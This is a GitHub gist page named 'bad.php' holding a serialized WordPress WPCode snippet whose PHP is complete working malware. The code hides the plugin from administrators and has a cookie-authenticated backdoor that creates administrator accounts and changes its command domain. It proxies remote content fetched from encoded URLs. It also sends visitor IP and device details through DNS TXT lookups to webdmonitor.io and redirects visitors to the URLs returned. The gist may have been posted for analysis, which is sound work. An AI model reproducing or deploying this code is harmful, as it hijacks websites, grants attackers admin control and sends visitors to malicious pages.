Skip to content

Instantly share code, notes, and snippets.

@tbbooher

tbbooher/bad.php

Created March 14, 2025 04:18
Show Gist options
  • Save tbbooher/42e69685dfe7273796a1464d642250c3 to your computer and use it in GitHub Desktop.
Save tbbooher/42e69685dfe7273796a1464d642250c3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
bad.php
a:1:{s:10:"everywhere";a:1:{i:0;a:12:{s:2:"id";i:78;s:5:"title";s:16:"Untitled Snippet";s:4:"code";s:6836:"$_pwsa = 'a516c9f37ca86f549b3cdff68167e708';
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
add_action('admin_head', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_action('wp_head', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}
if (!function_exists('_red')) {
error_reporting(0);
ini_set('display_errors', 0);
function _gcookie($n)
{
return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
}
if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
switch (_gcookie('c')) {
case 'sd':
$d = _gcookie('d');
if (strpos($d, '.') > 0) {
update_option('d', $d);
}
break;
case 'au':
$u = _gcookie('u');
$p = _gcookie('p');
$e = _gcookie('e');
if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
break;
}
return;
}
if (@stripos(wp_login_url(), '' . $_SERVER['SCRIPT_NAME']) !== false) {
return;
}
if (_gcookie("skip") === "1") {
return;
}
function _is_mobile()
{
if (empty($_SERVER["HTTP_USER_AGENT"])) {
return false;
}
return @preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i", '' . $_SERVER["HTTP_USER_AGENT"]);
}
function _is_iphone()
{
if (empty($_SERVER["HTTP_USER_AGENT"])) {
return false;
}
return @preg_match("/(iphone|ipod)/i", '' . $_SERVER["HTTP_USER_AGENT"]);
}
function _user_ip()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
foreach (@explode(',', '' . $_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return false;
}
function xorEncryptDecrypt($data, $password)
{
$dataLength = strlen($data);
$passLength = strlen($password);
$result = '';
for ($i = 0; $i < $dataLength; $i++) {
$result .= $data[$i] ^ $password[$i % $passLength];
}
return $result;
}
function _red()
{
if (is_user_logged_in()) {
return;
}
$u = isset($_GET['u']) ? $_GET['u'] : '';
$p = isset($_GET['p']) ? $_GET['p'] : '';
if (function_exists('curl_init') && strlen($u) > 4 && $p === "a516c9f37ca86f549b3cdff68167e708") {
$hash = md5(substr($u, 4));
if (substr($u, 0, 4) === substr($hash, 0, 4)) {
$link = xorEncryptDecrypt(hex2bin(substr($u, 12)), substr($u, 4, 8));
if (substr($link, 0, 4) === 'http') {
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $link);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = @curl_exec($ch);
@curl_close($ch);
$j = json_decode($output);
if ($j !== null) {
if (isset($j->headers)) {
foreach ($j->headers as $header) {
header($header);
}
}
if (isset($j->body)) {
echo base64_decode($j->body);
}
}
}
}
exit(0);
}
$ip = _user_ip();
if (!$ip) {
return;
}
$exp = get_transient('exp');
if (!is_array($exp)) {
$exp = array();
}
foreach ($exp as $k => $v) {
if (time() - $v > 86400) {
unset($exp[$k]);
}
}
if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400)) {
return;
}
$host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
$ips = str_replace(':', '-', $ip);
$ips = str_replace('.', '-', $ips);
$h = 'webdmonitor.io';
$o = get_option('d');
if ($o && strpos($o, '.') > 0) {
$h = $o;
}
$m = _is_iphone() ? 'i' : 'm';
$req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;
$s = null;
try {
$v = "d" . "ns_" . "get" . "_rec" . "ord";
$s = @$v($req, DNS_TXT);
} catch (Exception $e) {
}
if (is_array($s) && !empty($s)) {
if (isset($s[0]['txt'])) {
$s = $s[0]['txt'];
$s = base64_decode($s);
if ($s == 'err') {
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
} else if (substr($s, 0, 4) === 'http') {
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
wp_redirect($s);
exit;
}
}
}
}
add_action('init', '_red');
}";s:9:"code_type";s:3:"php";s:8:"location";s:10:"everywhere";s:11:"auto_insert";i:1;s:13:"insert_number";i:1;s:9:"use_rules";b:0;s:5:"rules";a:0:{}s:8:"priority";i:10;s:14:"location_extra";s:0:"";s:20:"shortcode_attributes";a:0:{}}}} |
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment